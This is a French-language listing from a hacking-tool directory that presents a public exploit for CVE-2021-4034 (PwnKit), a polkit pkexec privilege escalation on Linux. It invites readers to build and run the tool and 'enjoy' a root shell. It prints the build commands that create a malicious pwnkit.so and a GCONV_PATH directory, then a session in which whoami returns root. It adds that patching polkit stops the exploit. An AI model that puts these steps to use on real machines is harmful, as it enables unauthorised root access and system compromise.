Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-4034 — Exploit pour CVE-2021-4034, une vulnérabilité d'élévation de privilèges polkit pkexec, fournissant un shell root sur les systèmes Linux vulnérables. | Kitploit
Outils/GitHubGitHub/an0n7os/cve-2021-4034
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationExploitation de Binaires
GitHuban0n7os/cve-2021-4034

CVE-2021-4034

Exploit pour CVE-2021-4034, une vulnérabilité d'élévation de privilèges polkit pkexec, fournissant un shell root sur les systèmes Linux vulnérables.

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-4034

Exploit d'élévation de privilèges polkit

Exécutez simplement make, ./cve-2021-4034 et profitez de votre shell root.

PoC

Si l'exploit fonctionne, vous obtiendrez un shell root immédiatement :

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

La mise à jour de polkit sur la plupart des systèmes corrigera l'exploit. Vous obtiendrez donc l'utilisation et le programme se terminera :

root@kitploit:~
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$

À propos de Polkit pkexec pour Linux

Polkit (anciennement PolicyKit) est un composant permettant de contrôler les privilèges à l'échelle du système sur les systèmes d'exploitation de type Unix. Il offre un moyen organisé aux processus non privilégiés de communiquer avec les processus privilégiés. Il est également possible d'utiliser polkit pour exécuter des commandes avec des privilèges élevés à l'aide de la commande pkexec suivie de la commande à exécuter (avec la permission root).

Télécharger l’outil